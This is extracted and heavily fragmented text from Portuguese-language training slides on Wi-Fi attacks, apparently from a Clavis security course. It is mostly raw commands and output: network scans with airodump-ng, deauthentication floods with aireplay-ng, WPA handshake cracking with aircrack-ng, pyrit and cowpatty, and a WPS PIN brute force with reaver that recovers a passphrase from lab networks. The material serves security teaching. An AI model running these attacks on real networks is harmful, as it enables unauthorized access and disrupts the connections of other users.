4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)
KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )
Decrypted correctly: 100%
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Wired Equivalent Privacy
WPA
CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
aircrack-‐ng
labvirus_wpa-‐01.cap
Opening
labvirus_wpa-‐01.cap
Read
254839
packets.
#
BSSID
ESSID
Encryp_on
1
00:07:40:4D:1A:5C
LABVIRUS
WPA
(0
handshake)
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 254839 packets.
# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 698 packets.
# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)
Choosing first network as target.
Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
39965 377.079356 D-Link_50:2f:2e -> D-
Link_74:15:28 EAPOL 131 Key (msg 1/4)
39968 377.086048 D-Link_74:15:28 -> D-
Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-
Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-
Link_50:2f:2e EAPOL 136 Key (msg 4/4)
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22
Wai_ng
for
beacon
frame
(ESSID:
dlink)
on
channel
6
Found
BSSID
"00:1B:11:50:2F:2E"
to
given
ESSID
"dlink".
08:49:22
Sending
64
directed
DeAuth.
STMAC:
[00:26:5A:74:15:28]
[
0|63
ACKs]
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22
Wai_ng
for
beacon
frame
(ESSID:
dlink)
on
channel
6
Found
BSSID
"00:1B:11:50:2F:2E"
to
given
ESSID
"dlink".
08:49:22
Sending
64
directed
DeAuth.
STMAC:
[00:26:5A:74:15:28]
[
0|63
ACKs]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22
Wai_ng
for
beacon
frame
(ESSID:
dlink)
on
channel
6
Found
BSSID
"00:1B:11:50:2F:2E"
to
given
ESSID
"dlink".
08:49:22
Sending
64
directed
DeAuth.
STMAC:
[00:26:5A:74:15:28]
[
0|63
ACKs]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.
# BSSID ESSID Encryption
1 00:1B:11:50:2F:2E dlink WPA (1 handshake)
Aircrack-ng 1.1
[00:01:09] 88192 keys tested (1274.66 k/s)
KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
time aircrack-ng –w popular_ptBR.dic dlink-01.cap
time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[…]
109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second
real 9m2.988s
user 9m2.468s
sys 0m0.414s
time genpmk –f popular.dic -d dlink234.pmk -s dlink
[…]
109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second
real 9m2.988s
user 9m2.468s
sys 0m0.414s _me
pyrit
–I
popular.dic
-‐o
dlink.pmk
-‐e
dlink
passthrough
Pyrit
0.4.1-‐dev(svn
r308)
(C)
2008-‐2011
Lukas
Lueg
hhp://pyrit.googlecode.com
This
code
is
distributed
under
the
GNU
General
Public
License
v3+
Computed
109216
PMKs
total;
1865
PMKs
per
secondd
real
1m20.753s
user
5m2.437s
sys
0m0.753s
Cowpatty
cowpahy
4.6
-‐
WPA-‐PSK
dic_onary
ahack.
<jwright@hasborg.com>
Collected
all
necessary
data
to
mount
crack
against
WPA2/PSK
passphrase.
Star_ng
dic_onary
ahack.
Please
be
pa_ent.
key
no.
10000:
22222222
key
no.
20000:
93833104
key
no.
30000:
And48560
key
no.
40000:
Cib00043
key
no.
50000:
enqetm17
key
no.
60000:
hamdan00
key
no.
70000:
liberta10
key
no.
80000:
Mil08187
The
PSK
is
”pxxxxxxxxxxxxxxxxxx".
89038
passphrases
tested
in
0.68
seconds:
130724.27
passphrases/second
cowpahy
–d
dlinkpop.pmk
-‐s
dlink
-‐r
dlink-‐01.cap
Cowpatty
time pyrit -r dlink-01.cap –I t-br_popular.dic attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'dlink-01.cap' (1/1)...
Parsed 19 packets (19 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.
Tried 109216 PMKs so far; 1870 PMKs per second.
The password is ’pxxxxxxxxxxxxx'.
real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (1239.9 PMKs/s)... \
Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (1239.9 PMKs/s)... \
Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (1880.5 PMKs/s)... /
Computed 1880.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)
Ataque ao WPS
Ataque ao WPS
WiFi
Protected
Setup
Recuperar
configuração
Reconfigurar
AP
Registrar
PIN
PIN
#
wash
-‐i
mon0
Wash
v1.4
WiFi
Protected
Setup
Scan
Tool
Copyright
(c)
2011,
Tac_cal
Network
Solu_ons,
Craig
Heffner
<cheffner@tacnetsol.com>
BSSID
Channel
RSSI
WPS
Version
WPS
Locked
ESSID
-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
48:5B:39:B0:2D:2C
3
-‐54
1.0
No
LABVIRUS
#
reaver
-‐i
mon0
-‐b
48:5B:39:B0:D0:2C
-‐v
Reaver
v1.4
WiFi
Protected
Setup
Ahack
Tool
Copyright
(c)
2011,
Tac_cal
Network
Solu_ons,
Craig
Heffner
<cheffner@tacnetsol.com>
[+]
Wai_ng
for
beacon
from
48:5B:39:B0:D0:2C
[+]
Associated
with
48:5B:39:B0:D0:2C
(ESSID:
LABVIRUS)
[+]
Trying
pin
12345670
[+]
WPS
PIN:
'12345670'
[+]
WPA
PSK:
’labvirus2013'
[+]
AP
SSID:
’LABVIRUS'
Dúvidas?
Perguntas?
Crí_cas?
Sugestões?
Siga a Clavis
http://clav.is/slideshare
http://clav.is/twitter
http://clav.is/facebook
Muito
Obrigado!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurança da InformaçãoMais conteúdos dessa disciplina
Projeto de Interligação de Redes- 1 (186)
- ping
- 15
- Questao av redes
- Avaliação ESTUDOS DISCIPLINARES XVI ADM
- SERVIÇOS INTERNET UNIDADE 3
- Camadas De Aplicação e Transporte - Exercicios 1
- Camadas De Aplicação e Transporte - Exercicios 1 - Respostas
- Camada De Rede - Exercicios 1
- Camada De Rede - Exercicios 1 - Respostas
- Questão 02 Quais são os protocolos não roteáveis?
- Conforme Muchinsky (1994), a satisfação laboral é, como qualquer sentimento de satisfação, uma resposta ateriva e emocional. O afeto faz referência às
- quais são as ações executadas por um switch cisco
- O projeto físico de uma rede de cabeamento estruturado é uma etapa crucial para garantir a eficiência e a funcionalidade do sistema. Durante esse proc
- AM & united source. Les @ fragmento de texts 1 1 Com @ more de espensa em 1940 Kidder withou ans Estados Unidos Spauding for embora ao final de 194...
- No centro de uma sala retangular com 40 m2 de área, foi instalado um dispositivo de emissão de ondas curtas com alcance circular de 2,5 metros de raio
- When performing live firmware upgrades on Aruba APs. which technology partitions all the APs based on RF neighborhood data minimizing the impact on cl
- 0:21:49 Questão 3/10 Atividades extensionistas / Projeto Integrador: Bases Fundamentais da Medicina Veterinária Ler em VOZ al Existem diversos prot...
- O QUE É Cluster de computadores COMO SÃO OS PROGRMAS QUE FAZEM RODAR OS COMPUTADORES QUAL A LINGUAGM
- What can be done to dynamically set the POE Priority on a switch port when deploying IP cameras, APs, and other POE devices? A) Configura POE power ma
- xiaomi 15 ultra flagship da marca com snapdragon 8 elite gen 4, câmeras leica de altíssimo nível, tela qhd+ ltpo 120 hz e acabamento premium. é o celu
- Os robôs são passíveis de aprendizado, no entanto de maneira bem específica. Sobre O tema, analise as sentenças e selecione a alternativa correta. A N
- Ler em VOZ alta A atuação ocorre na robótica através de motores. Sobre O assunto, relacione as opções às suas respectivas características, e selecione
- Governança de TI Nota 10
- Introducing Python - Bill Lubanovic